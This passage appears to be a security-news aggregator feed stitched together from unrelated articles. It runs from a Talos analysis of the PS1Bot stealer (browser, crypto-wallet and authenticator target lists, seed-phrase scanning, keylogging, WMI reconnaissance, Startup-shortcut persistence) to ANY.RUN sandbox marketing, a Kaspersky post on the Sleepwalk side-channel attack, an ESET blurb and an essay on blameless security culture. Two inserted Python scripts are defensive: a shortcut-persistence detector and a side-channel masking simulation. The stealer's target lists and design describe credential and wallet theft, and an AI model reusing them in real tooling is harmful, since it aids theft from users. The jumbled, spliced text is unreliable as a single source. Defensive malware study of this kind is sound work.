Yandex
Chedot
SalamWeb
Slimjet
Chrome Beta
Sidekick
Epic Privacy Browser
Chrome Canary
Sleipnir
Comodo Dragon
Citrio
Sputnik
CentBrowser
CoolNovo
Superbird
Naver Whale
Coowon
Swing Browser
SRWare Iron
CryptoTab Browser
Tempest
Blisk
Elements Browser
UC Browser
Torch
Iridium
Ulaa
Coc Coc
Kinza
UR Browser
Amigo
Wavebo
Viasat Browser
In addition to the previously listed browsers, the information stealer also checks for the installation of the following Chromium extensions, most of which are associated with cryptocurrency wallets and multi-factor authentication (MFA) authenticators:
MetaMask
Trezor
wallet-guard-protect-your
MetaMask-edge
Ledger
subwallet-polkadot-wallet
MetaMask-Opera
Mycelium
argent-x-starknet-wallet
Trust-Wallet
TrustWallet
bitget-wallet-formerly-bi
Atomic-Wallet
Ellipal
core-crypto-wallet-nft-ex
Binance
Dapper
braavos-starknet-wallet
Phantom
BitKeep
Kepler
Coinbase
Argent
martian-aptos-sui-wallet
Ronin
Blockchain Wallet
xverse-wallet
Exodus
cryptocom-wallet-extension
gate-wallet
Coin98
Zerion
sender-wallet
KardiaChain
Aave
desig-wallet
TerraStation
Curve
fewcha-move-wallet
Wombat
SushiSwap
kepler-edge
Harmoney
Uniswap
okx-wallet
Nami
1inch
unisat-wallet
MartianAptos
petra-aptos-wallet
xdefi-wallet
Braavos
manta-wallet
rose-wallet
XDEFI
TON
Authenticator
Yoroi
Tron
If discovered, associated extension data is staged using a process similar to that described earlier for web browser application data. The information stealer also attempts to locate locally installed cryptocurrency wallet applications and MFA applications, including the following:
Authy Desktop
Atomic
Armory
Exodus
Electrum
Bytecoin
Coinomi
Daedalus
Ethereum
Bitcoin Core
Ledger Live
Guarda
Binance
Zcash
TrustWallet
One interesting piece of functionality included with the information stealer is a scanner that is designed to identify and exfiltrate files containing sensitive information. The script contains a large wordlist of English words. We have also observed variants of the grabber module that contain wordlists targeting other languages, such as Czech. Additionally, we have observed versions that contain multiple wordlists targeting different cryptocurrency wallet seed phrase combinations.
Figure 9. Wallet seed phrase wordlist.
This wordlist is designed to be used to identify files that may contain cryptocurrency wallet seed phrases, which can be used to regain access to wallets in the case that the primary authentication method is unavailable. This is performed by iterating through the file system on local hard drives, identifying files matching specific file extensions and file sizes, and then scanning them for the presence of multiple string values matching the wordlist.
Figure 10. File scanning parameters.
It also attempts to identify files that may contain passwords.
Figure 11. Password file detection criteria.
Once the sensitive information has been collected, it is then compressed and exfiltrated to the attacker’s C2 server.
Figure 12. Compressed archive exfiltration logic.
Data compression and exfiltration are performed via an HTTP POST request, as shown in Figure 13.
Figure 13. Example HTTP POST containing compressed archive.
Any discovered wallet seed phrases are communicated to the attacker using HTTP GET requests, using a format similar to the one in Figure 14.
Figure 14. Transmission of detected wallet seed phrase contents.
This demonstrates a robust information stealer that, in this case, has been implemented as a PowerShell module.
Keylogger
The keylogging and clipboard capture module is implemented similarly to the screen capture module described earlier, with PowerShell being used to dynamically compile and execute a C# assembly DLL at runtime.
Figure 15. Example use of Add-Type in PowerShell.
The keylogger uses SetWindowsHookEx() to monitor keyboard and mouse events to facilitate the capture of keystrokes and mouse activity on the system.
Figure 16. Example SetWindowsHookEx() logic.
Clipboard contents are also monitored so that information copied can be dynamically logged as well. As with other modules, status logging has been implemented and is performed via HTTP GET requests, an example of which is:
The module also relays this status in the body of an HTTP POST request.
Figure 17. Status logging transmission to C2.
Collected data is transmitted to the attacker via HTTP POST requests similar to Figure 18.
Figure 18. Keystroke log transmission.
Information collection
We have also observed the delivery of a system survey module that the attacker refers to as “WMIComputerCSHARP” that is used to collect and transmit information about the infected system and environment to the attacker. Consistent with the design of the screenshot and keylogging modules, this module is implemented using a combination of PowerShell and C# and features the use of runtime compilation.
The module uses WMI to query the domain membership information of the infected system, likely to enable the attacker to perform reconnaissance to determine whether they have gained access to a high-value target.
Figure 19. Survey collection status logging message.
The following WMI queries are performed as part of this process:
SELECT Domain, PartOfDomain FROM Win32_ComputerSystem
SELECT DomainName FROM Win32_NTDomain WHERE ClientSiteName IS NOT NULL
In addition, the %USERDNSDOMAIN% environment variable is also queried to attempt to enumerate the domain membership of the infected system. The collected information is transmitted to the attacker’s C2 server, consistent with what was described for other modules.
Figure 20. Example status logging implementation.
Persistence
We have also observed the delivery of a persistence module that can be used as desired to ensure that the main looping mechanism is re-executed following a system restart or user session termination. This allows for the reestablishment of a C2 communications channel and enables the delivery of additional modules as desired by the adversary.
The module begins by attempting to create a PowerShell script that will be executed each time the system restarts. The module creates a randomly generated directory within the %PROGRAMDATA% directory that will be used to store the components needed for persistence. These include a randomly-named PowerShell script (PS1) as well as a randomly-named shortcut file (ICO). A malicious randomly-named LNK file is also created in the Startup directory that is configured to point to the PowerShell script previously created so that it can be executed each time the system is rebooted.
The ICO file is created using base64-encoded content delivered as part of the module itself. The PowerShell script contents are generated by retrieving an obfuscated blob from the C2 server, which in our sample was hosted at the URL path /transform.
Figure 22. Persistence payload retrieval.
A simulated example of this process is shown in Figure 23.
Figure 23. Simulated delivery of obfuscated persistence payload.
This content is then written to the PS1 file and the LNK file is generated with the appropriate parameters to enable execution in the future. When deobfuscated, the PowerShell script simply contains the same logic used to establish the C2 polling process described earlier in the infection chain.
Figure 24. Deobfuscated persistence payload.
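As an added example (not code from the Talos report), the following Python script triages Startup-folder shortcuts for the persistence pattern described above: a .lnk whose target launches PowerShell on a script stored under %PROGRAMDATA%. It parses only the ShellLinkHeader and StringData sections of the MS-SHLLINK format, and the sample shortcut, directory and script names it builds are constructed placeholders.

```python
"""Triage Startup-folder .lnk files for the PS1Bot persistence pattern: a shortcut that
runs PowerShell on a .ps1 stored in a randomly-named %PROGRAMDATA% subdirectory.
Added example, not Talos code.  The parser reads the ShellLinkHeader and StringData
sections of MS-SHLLINK; LinkTargetIDList and LinkInfo are skipped, not decoded."""
import os
import re
import struct
from dataclasses import dataclass
from pathlib import Path
from typing import Iterator, Tuple

# LinkFlags bits (MS-SHLLINK 2.1.1) and the fixed header size
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
HEADER_SIZE = 0x4C
LINK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46"


@dataclass
class LnkStrings:
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> LnkStrings:
    """Return the StringData fields of a .lnk; raises ValueError on malformed input."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        width = 2 if unicode else 1
        raw = data[pos + 2:pos + 2 + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData")
        pos += 2 + count * width
        return raw.decode("utf-16-le" if unicode else "cp1252")

    out = LnkStrings()
    for flag, field in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                        (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                        (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:                          # StringData appears in this fixed order
            setattr(out, field, read_string())
    return out


POWERSHELL = re.compile(r"(?i)powershell(?:\.exe)?|pwsh(?:\.exe)?")
PS1_IN_PROGRAMDATA = re.compile(r"""(?i)(?:%programdata%|\\programdata\\)[^\s"']*\.ps1""")


def is_suspicious(lnk: LnkStrings) -> bool:
    """True when the shortcut launches PowerShell on a .ps1 that lives under ProgramData."""
    text = " ".join((lnk.relative_path, lnk.working_dir, lnk.arguments))
    return bool(POWERSHELL.search(text) and PS1_IN_PROGRAMDATA.search(text))


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk (header + RelativePath + Arguments) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, flags).ljust(HEADER_SIZE, b"\x00")

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(relative_path) + enc(arguments)


def scan_startup(folder: Path) -> Iterator[Tuple[Path, LnkStrings]]:
    """Yield (path, strings) for every parseable .lnk in folder that matches the pattern."""
    for lnk_path in folder.glob("*.lnk"):
        try:
            strings = parse_lnk(lnk_path.read_bytes())
        except (ValueError, struct.error, OSError):
            continue
        if is_suspicious(strings):
            yield lnk_path, strings


if __name__ == "__main__":
    # constructed sample; "xk3q9" and "r7ha2.ps1" stand in for the random names
    sample = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       r"-File C:\ProgramData\xk3q9\r7ha2.ps1")
    print(is_suspicious(parse_lnk(sample)))  # True
    if os.name == "nt":                       # per-user Startup folder on a live host
        startup = Path(os.environ["APPDATA"]) / r"Microsoft\Windows\Start Menu\Programs\Startup"
        for path, strings in scan_startup(startup):
            print(path, strings.relative_path, strings.arguments)
```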
We assess with high confidence that additional modules are likely available for deployment as needed by the adversary, and that the use of this framework provides a flexible means to rapidly extend its functionality as required.
Links to previous intrusion activity
During our analysis of the code and functionality associated with this infection chain, we observed similarities with components referenced in prior reporting related to the use of Skitnet/Bossnet to deliver PowerShell modules to infected systems. We have also observed multiple overlaps in the C2 infrastructure used in this campaign and the one described by the aforementioned reporting. Additionally, we assess with high confidence that the final deobfuscated payload dropped by the persistence module described above was likely created by the same entity that created the PowerShell script described in the prior reporting. The overall implementation, use of specific variables throughout the code, and matching C2 URL construction strengthen this assessment. Below is a comparison of the code in both instances.
Figure 25. Comparison of persistence payload (left) vs. ProDaft reporting (right).
As observable in Figure 25, the only difference between the two samples is the addition of mutex handling and sleep periods.
While Talos did not identify any direct overlap in activity related to these malware families, we noted similarities in the design architecture and functionality provided by the PS1Bot malware delivered in this case and that present in another malware family Talos previously reported on called AHK Bot. The derivation of the C2 URL path based on the drive serial number is consistent across both malware families. Likewise, the use of a main polling script and subsequent delivery and execution of purpose-built modules is also similar to the design architecture found with AHK Bot. There are also several similarities in the types of modules available for both malware families. Heavy use of URL parameters when communicating with C2 is another similarity between the two families.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for the threats are:
Snort2: 65231 – 65233
Snort3: 65231 – 65233
ClamAV detections are also available for this threat:
Indicators of compromise (IOCs)
IOCs for this threat can be found in our GitHub repository here.
Editor’s note: The current article was originally published on November 26, 2020, and updated on August 12, 2025.
If you’re an independent malware analyst or threat researcher, you need a solution that works as hard as you do; one that’s flexible, private, and built for deep, hands-on investigations.
Hunter puts that power in your hands. With 70% of ANY.RUN’s Interactive Sandbox capabilities, you can dive into advanced investigations, expose hidden threats, and keep every detail locked down.
Let’s look at why so many solo analysts make Hunter their plan of choice.
Keep Your Analyses Secure
Hunter plan advantages you can’t miss
The Hunter plan gives analysts the privacy they need to work with sensitive samples confidently.
You decide who can access your submissions, whether you want to keep them completely private, share with a trusted contact, or display them in a controlled presentation mode.
Benefits of private sandbox analyses
This control is backed by strong security measures that protect your data at every stage:
Our SOC 2 Type 1 certification is backed by independent assessments, verifying that we have robust controls in place to protect user data, private malware analyses, and system integrity
Data is encrypted at rest with AES-256, ensuring stored files remain secure against unauthorized access.
Hunter enables rapid, controlled analysis of suspicious files and URLs across a range of environments, from Windows 7, 10, and 11 to Linux and Android. In most investigations, the sandbox delivers a reliable verdict in under 40 seconds, allowing analysts to act without delay.
By fully detonating each attack and interacting with it at every stage, you can observe its complete execution chain, including those steps designed to evade automated tools. Detonation actions and environment fine-tuning work together to make threat identification both precise and efficient, even when dealing with multi-layered or highly evasive malware.
The intuitive interface makes it easy to navigate complex analyses, while helping analysts of all experience levels deepen their expertise with every investigation.
Real-World Example of Phishing Attack
One real-world case shows exactly why this capability matters.
Fake document with malicious PDF displayed inside ANY.RUN sandbox
A phishing email arrived with an SVG attachment and a password hidden in the message body. Opening the SVG in the sandbox revealed a fake document containing a link to download a PDF. Clicking that link triggered the download of a ZIP archive; one that could only be extracted by manually entering the earlier password.
Entering password hidden in the message body
Inside was an executable file. When run, ANY.RUN immediately flagged it as AsyncRAT — a remote access trojan capable of spying on and controlling infected systems.
AsyncRAT detected by ANY.RUN sandbox
Without interactivity, this chain would have remained hidden. A fully automated tool wouldn’t have clicked the link, copied the password, or opened the archive, leaving the threat undetected.
Here, the AI Assistant also stepped in to summarize the full chain of actions, making it easier for a junior analyst to quickly understand the threat without manually piecing together every detail.
Network activity visibility, enabling the team to block C2 communications before data exfiltration
Gain Better Visibility into Threat Behavior
Hunter helps you understand exactly how malware operates, so you can respond with precision.
Inside the analysis session, you can view MITRE ATT&CK®-mapped TTPs to see which tactics and techniques the threat uses. This makes it easier to assess the attack’s sophistication, connect it to known threat actors, and prioritize the right defensive actions.
You can also explore attack patterns through the process graph and triggered rules, visualizing every step of the execution chain. This helps analysts quickly grasp complex behaviors, uncover hidden stages, and spot anomalies that might otherwise be missed.
When the investigation is complete, you can generate detailed reports with IOCs, ready for sharing with colleagues, integrating into SIEM or EDR systems, or using to update detection rules. This ensures your findings don’t just stay in the lab but actively strengthen defenses.
Real-World Example: Gootloader Infection Chain
A live Gootloader case in the Hunter sandbox begins with a user landing on a compromised website while searching for something business-related, such as a contract template. The site delivers a ZIP file containing a trojanized JavaScript file disguised as a common library like jQuery. Once opened, the script runs via wscript.exe, launching a heavily obfuscated payload.
Analysis of the Gootloader Node.js malware inside ANY.RUN’s Interactive Sandbox
The process graph shows the full attack chain: the first-stage payload drops a second-stage JavaScript file, creates a scheduled task for persistence, and hands execution from wscript.exe to cscript.exe, which then spawns a PowerShell process.
ANY.RUN’s process graph with full attack chain
Mapped TTPs in the MITRE ATT&CK® section reveal multiple techniques, including system reconnaissance, persistence via scheduled tasks, and data exfiltration through HTTP headers.
PID 7828 with its exposed techniques and tactics inside ANY.RUN sandbox
At the end of the investigation, a detailed report with IOCs is generated, containing domains, file hashes, and registry keys. These can be shared instantly with your team or imported into security tools to block future attacks.
Well-structured report generated by ANY.RUN sandbox
Uncover Evasive Malware Designed to Evade Detection
Some threats are designed to stay hidden, activating only under specific system conditions, locales, or network environments. Hunter equips you with the tools to expose them.
You can dissect samples in depth by inspecting network traffic, registry modifications, and running processes, giving you a complete picture of the malware’s activity and persistence mechanisms. This visibility is critical for detecting hidden payloads and spotting malicious behavior that traditional scanners might miss.
Hunter also lets you gather unique IOCs directly from malware configurations and Suricata IDS detections. These high-confidence indicators can be used to update detection rules, block malicious infrastructure, and improve threat-hunting accuracy across your environment.
Finally, you can investigate in-depth by customizing the OS, installed tools, and network settings. Switch locales, adjust keyboard languages, or route traffic through specific regions using a residential proxy to bypass geofencing. This flexibility enables you to trigger and observe behaviors that would otherwise remain dormant, ensuring no evasion technique goes unnoticed.
Revealing Geofenced Malware with Locale and Network Routing
Some malware is geofenced, checking the geolocation of the infected host before delivering a payload. If the system isn’t in a target country, the attack simply won’t proceed.
With Hunter, you can bypass these restrictions by changing the system locale and routing traffic through another region, either via TOR or a residential proxy.
In this case, a malicious document with an Italian-language template was analyzed in a default en-US environment. The Regsvr32.exe process launched but didn’t receive any payload, terminating shortly after. Restarting the analysis with the locale set to it-IT and routing traffic through Italy via TOR revealed the hidden threat: Ursnif (Gozi) was successfully downloaded as a payload.
Detection of Ursnif (Gozi) malware using TOR inside ANY.RUN sandbox
This combination of environment customization and network rerouting allows analysts to uncover full attack chains, capture critical IOCs, and study malware that would otherwise remain invisible in automated or default setups.
Scale Early Threat Detection, Reduce Business Risks with Enterprise Plan
ANY.RUN’s Enterprise plan is a comprehensive solution for SOC teams
Built for SMBs, large enterprises, MSSPs, and government agencies, the Enterprise plan gives SOC teams the full power of ANY.RUN’s Interactive Sandbox, with advanced capabilities for security, automation, and collaboration.
Key ANY.RUN stats
+36% average detection rate improvement in SOC environments
20% workload reduction for Tier 1 analysts through automated triage
21 minutes faster MTTR per case boosting overall SOC efficiency
Up to 3x overall SOC performance gains when scaling across large teams
30% fewer escalations from Tier 1 to Tier 2, thanks to skill-building through interactive analysis
Trusted by 15,000+ organizations across finance, telecom, retail, government, and healthcare
Enterprise is designed for teams that need to investigate faster, work together seamlessly, and stay ahead of evolving threats.
ANY.RUN’s Enterprise plan provides teamwork functionality
With Enterprise, you can:
Slash business risk with early threat detection to prevent costly damage to your infrastructure and reputation.
Cut MTTR through quick triage and clear threat insights that speed up decisive threat response.
Increase detection rate by analyzing all types of Windows, Linux (including ARM), and Android files to identify more threats faster.
Enhance productivity by automating routine tasks to help teams focus on critical incidents with less fatigue.
Develop analyst expertise through hands-on, guided analysis that doubles as real-world training and saves on resources on onboarding.
Protect sensitive data with private analyses, compliance with strict security frameworks, and isolated working environments.
Collaborate seamlessly with shared investigations, role-based permissions, and productivity tracking for the whole SOC.
ANY.RUN’s Enterprise plan provides customizable integration with your security stack
Enterprise provides API/SDK access that lets SOC teams use ANY.RUN’s connectors for popular security solutions such as SIEM, XDR and TIP systems to streamline workflows and increase response speed even further.
Case Study: Expertware Cuts Investigation Time by 50%
Challenge: Expertware, a leading European MSSP, needed to accelerate malware investigations, cut down on manual processes, and deliver faster, higher-quality results to its clients.
Result: By adopting ANY.RUN Enterprise, Expertware reduced investigation turnaround time by 50%, boosted SOC efficiency with real-time collaborative analysis and shared reports, and gained complete visibility into multi-stage and fileless attacks, from initial macro execution to C2 communications. These improvements allowed them to deliver clearer, more actionable reports, enabling clients to respond before threats escalated.
“ANY.RUN’s interactive approach was critical in dissecting a complex multi-stage XLoader campaign and swiftly mitigating its impact across our network.” — Expertware, Leading European MSSP
Ready to Get Started?
Whether you need the agility of Hunter or the full-scale power of Enterprise, ANY.RUN gives you the solutions to detect, investigate, and stop threats faster.
Contact us for a trial or a personalized quote today.
About ANY.RUN
Designed to accelerate threat detection and improve response times, ANY.RUN equips teams with interactive malware analysis capabilities and real-time threat intelligence.
ANY.RUN’s cloud-based sandbox supports investigations across Windows, Linux, and Android environments. Combined with Threat Intelligence Lookup and Feeds, our solutions give security teams full behavioral visibility, context-rich IOCs, and automation-ready outputs, all with zero infrastructure overhead.
Ready to see how ANY.RUN’s services can power your SOC?
Hunter Plan: Fast and Private Threat Analysis for Solo Malware Researchers (posted by admin, 2025-08-12 13:06:38)
Information security has multiple layers of complexity. Effective yet technically simple attacks through phishing emails and social engineering are well known. We also often post about sophisticated targeted attacks that exploit vulnerabilities in enterprise software and services. And among the most sophisticated are attacks that exploit fundamental hardware features. Although such attacks aren’t cheap, the cost doesn’t deter all threat actors. Or at least researchers.
Researchers at two US universities recently published a paper with a fascinating example of an attack on hardware. Using the standard operating system feature for switching between tasks, the researchers developed an attack they named Sleepwalk, which can crack a cutting-edge data encryption algorithm.
Side-channeling — sleep-walking
Sleepwalk is a type of side-channel attack. In this context, “side channel” typically refers to any method of stealing secret information by indirect observation. For example, imagine someone is typing a password on a keyboard. You can’t see the letters/symbols, but you can hear the keys being pressed. This is a feasible attack in which the sound of the keystrokes — the side channel — reveals what text is being typed. A classic example of a side channel is monitoring changes in the power consumption of a computer system.
Why does power consumption vary? Simple: different computing tasks require different resources. Serious number crunching will max out the load on the CPU and RAM, while typing in a text editor will see the computer mostly idle. In some cases, changes in power consumption give away sensitive information, such as private keys for data encryption. This is similar to how a few barely audible clicks can reveal the correct rotor positions to pick the combination lock on a safe.
Why are these attacks sophisticated? Because a computer performs multiple tasks simultaneously. And all of them affect power consumption in one way or another. Extracting useful information from this noise is a highly complex job. Even when analyzing the simplest devices such as smart card readers, researchers take hundreds of thousands of measurements in a short period, repeating them tens or hundreds of times, then apply sophisticated signal-processing methods to confirm or refute the possibility of a side-channel attack. Sleepwalk in a sense simplifies this work: the researchers were able to extract useful information by measuring the pattern of power consumption just once, during a so-called context switch.
Figure: voltage fluctuations during CPU context switching.
Context switching
We’re all used to switching between programs on a computer or smartphone. At a deeper level, such multitasking is enabled by various mechanisms behind the scenes, one of which is context switching. The state of one program is saved, while data from another is loaded into the CPU. The decision on which program to give priority to, and when, is made by the operating system. That said, there’s a simple way for a programmer to force a context switch by adding a sleep instruction to the program code. The operating system then sees that the program doesn’t require CPU power for the time being, and switches to another task. Context switching, especially when the sleep function is called, is an energy-consuming activity that requires saving the state of one program and loading data from another into the CPU. The screenshot above shows a spike in the measured voltage during such a switch.
As it turns out, the nature of this power spike is determined both by the task that was running before and by the data being processed. Essentially, the researchers hugely simplified implementing a side-channel attack in which the system’s energy consumption is measured. Instead of measuring over a long period, a single spike is analyzed at a predetermined time. This serves up indirect data of two types: what program was running before the switch, and what data was being processed. All that remains is to carry out the attack according to the scheme below:
The researchers did their experiments on a single-board Raspberry Pi 4, demonstrating first of all that the power spike produced by different computing tasks during context switching has a unique fingerprint. Let’s suppose that this computer is performing data encryption. We can feed any text to the encryption algorithm as input, but we don’t know the key for encrypting the data.
What if we trigger a context switch at a specific point in the encryption algorithm’s operation? The operating system will save the state of the program, causing a spike in power consumption. Using an oscilloscope to repeatedly measure the nature of this spike, the researchers were able to extract the secret key!
That was just one of many important things learned in the experiment. They also succeeded in fully reconstructing a SIKE private key. The fairly new encryption algorithm SIKE is proposed as a replacement for traditional algorithms to protect data even in the quantum age. Yet despite its apparent innovativeness, questions are already being asked about the algorithm’s strength. Moreover, to extract the secret key, the researchers didn’t just carry out a Sleepwalk attack, but also exploited a weakness in the algorithm itself.
The Sleepwalk attack was unable to fully crack the traditional and reliable (but not post-quantum) AES-128 algorithm. But the team was able to reconstruct 10 of the 16 bytes of the private key — and this in itself is an achievement since Sleepwalk is somewhat simpler than other side-channel attack methods.
Sure, there’s no talk yet of deploying Sleepwalk in practice. The researchers merely wanted to demonstrate that power spikes during context switching can reveal secret information. Which they did. But bad guys one day might be able to develop the attack so as to steal real secrets — be they from a computer, secure flash drive, or crypto wallet.
As a result of this research, existing and in-development encryption algorithms should become a little more reliable. Not only that, the Sleepwalk attack indirectly highlights a key aspect of implementing cryptographic systems. Future algorithms will need to be resistant to analysis using quantum computing (so-called “post-quantum cryptography”); but no less vitally, they will need to be implemented correctly. Otherwise, a new, theoretically more secure algorithm may turn out to be more vulnerable to traditional attacks than a pre-quantum one.
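As an added illustration of that last point (not code from the Sleepwalk paper or from this blog), the following Python simulation uses a simplified leakage model assumed here: the measured spike is proportional to the Hamming weight of the state byte the OS writes out at the context switch, plus Gaussian noise. It shows why that observable correlates with the secret when the state is stored in the clear, and why Boolean masking, a standard countermeasure, removes the first-order correlation.

```python
"""Simulated first-order leakage assessment of state saved at a context switch.

Leakage model (an assumption for this example, not the paper's measurements):
power spike ~ Hamming weight of the state byte written to memory, plus noise.
"""
import random
import statistics


def hamming_weight(x: int) -> int:
    """Number of set bits in one byte."""
    return bin(x & 0xFF).count("1")


def pearson(xs, ys) -> float:
    """Pearson correlation coefficient between two equal-length sequences."""
    mx, my = statistics.fmean(xs), statistics.fmean(ys)
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs)
    vy = sum((y - my) ** 2 for y in ys)
    return cov / (vx * vy) ** 0.5 if vx and vy else 0.0


def saved_state_leak(key_byte: int, pt_byte: int, masked: bool,
                     rng: random.Random, noise: float = 0.5) -> float:
    """Simulated power contribution of saving one state byte at a switch.

    The state is key XOR plaintext (as in an AES AddRoundKey step, used here
    only as a plausible intermediate value, not as the paper's target).
    """
    v = key_byte ^ pt_byte
    if masked:
        m = rng.randrange(256)
        # Both shares are written out. Per bit, (v_i ^ m_i) + m_i is 1 when
        # v_i = 1 and either 0 or 2 when v_i = 0, so the mean weight is 8
        # whatever v is: no first-order dependence on the secret remains.
        hw = hamming_weight(v ^ m) + hamming_weight(m)
    else:
        hw = hamming_weight(v)
    return hw + rng.gauss(0.0, noise)


def secret_correlation(key_byte: int, masked: bool,
                       n: int = 2000, seed: int = 1) -> float:
    """Correlation between observed spikes and HW(key ^ pt) over n switches.

    A defender's leakage check: a value near zero means the observable does
    not depend (to first order) on the secret state being saved.
    """
    rng = random.Random(seed)
    pts = [rng.randrange(256) for _ in range(n)]        # constructed inputs
    traces = [saved_state_leak(key_byte, p, masked, rng) for p in pts]
    hyp = [hamming_weight(key_byte ^ p) for p in pts]
    return pearson(traces, hyp)


if __name__ == "__main__":
    k = 0x2B  # constructed sample key byte
    print(f"unmasked state: corr = {secret_correlation(k, masked=False):.3f}")
    print(f"masked state:   corr = {secret_correlation(k, masked=True):.3f}")
```

Masking does not remove the second-order leak (the variance of the combined share weight still depends on the secret), which is why real implementations combine masking with other countermeasures.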
Sleepwalk: a sophisticated way to steal encryption keys | Kaspersky official blog (posted by admin, 2025-08-12 11:06:49)
The attacks used spearphishing campaigns to target financial, manufacturing, defense, and logistics companies in Europe and Canada, ESET research finds
ESET Research discovered a zero-day vulnerability in WinRAR being exploited in the wild in the guise of job application documents; the weaponized archives exploited a path traversal flaw to compromise their targets
Even companies with a mature cybersecurity posture and significant investments into data protection aren’t immune to cyber-incidents. Attackers can exploit zero-day vulnerabilities or compromise a supply chain. Employees can fall victim to sophisticated scams designed to breach the company’s defenses. The cybersecurity team itself can make a mistake while configuring security tools, or during an incident response procedure. However, each of these incidents represents an opportunity to improve processes and systems, making your defenses even more effective. This isn’t just a rallying call; it’s a practical approach that’s been successful enough in other fields such as aviation safety.
Almost everyone in the aviation industry — from aircraft design engineers to flight attendants — is required to share information to prevent incidents. This isn’t limited to crashes or system failures; the industry also reports potential problems. These reports are constantly analyzed, and safety measures are adjusted based on the findings. According to Allianz Commercial’s statistics, this continuous implementation of new measures and technologies has led to a significant reduction in fatal incidents — from 40 per million flights in 1959 to 0.1 in 2015.
Still in aviation, it was recognized long ago that this model simply won’t work if people are afraid to report procedure violations, quality issues, and other causes of incidents. That’s why aviation standards include requirements for non-punitive reporting and a just culture, meaning that reporting problems and violations shouldn’t lead to punishment. DevOps engineers have a similar principle they call a blameless culture, which they use when analyzing major incidents. This approach is also essential in cybersecurity.
Does every mistake have a name?
The opposite of a blameless culture is the idea that “every mistake has a name”, meaning a specific person is to blame. Under this approach, every mistake can lead to disciplinary action, including termination. This principle is considered harmful and doesn’t lead to better security.
Distorted or partially destroyed evidence complicates the response and worsens the overall outcome because security teams can’t quickly and properly assess the scope of a given incident.
Zeroing in on one person to blame during an incident review prevents the team from focusing on how to change the system to prevent similar incidents from happening again.
Employees are afraid to report violations of IT and security policies, causing the company to miss opportunities to fix security flaws before they lead to a critical incident.
Employees have no motivation to discuss cybersecurity issues, coach one another, or correct their coworkers’ mistakes.
To truly enable every employee to contribute to your company’s security, you need a different approach.
The core principles of a just culture
Call it “non-punitive reporting” or a “blameless culture” — the core principles are the same:
Everyone makes mistakes. We learn from our mistakes; we don’t punish them. However, it’s crucial to distinguish between an honest mistake and a malicious violation.
When analyzing security incidents, the overall context, the employee’s intent, and any systemic issues that may have contributed to the situation all need to be considered. For example, if a high turnover of seasonal retail employees prevents them from being granted individual accounts, they might resort to sharing a single login for a point-of-sale terminal. Is the store administrator at fault? Probably not.
Beyond just reviewing technical data and logs, you must have in-depth conversations with everyone involved in an incident. For this you should create a productive and safe environment where people feel comfortable sharing their perspectives.
The goal of an incident review should be to improve behavior, technology, and processes in the future. For serious incidents, the process should be split into two parts: an immediate response to mitigate the damage, and a postmortem analysis to improve your systems and procedures.
Most importantly, be open and transparent. Employees need to know how reports of issues and incidents are handled, and how decisions are made. They should know exactly who to turn to if they see or even suspect a security problem. They need to know that both their supervisors and security specialists will support them.
Confidentiality and protection. Reporting a security issue should not create problems for the person who reported it or for the person who may have caused it — as long as both acted in good faith.
How to implement these principles in your security culture
Secure leadership buy-in. A security culture doesn’t require massive direct investment, but it does need consistent support from the HR, information security, and internal communications teams. Employees also need to see that top management actively endorses this approach.
Document your approach. The blameless culture philosophy should be captured in your company’s official documents — from detailed security policies to a simple, short guide that every employee will actually read and understand. This document should clearly state the company’s position on the difference between a mistake and a malicious violation. It should formally state that employees won’t be held personally responsible for honest errors, and that the collective priority is to improve the company’s security, and prevent future recurrences.
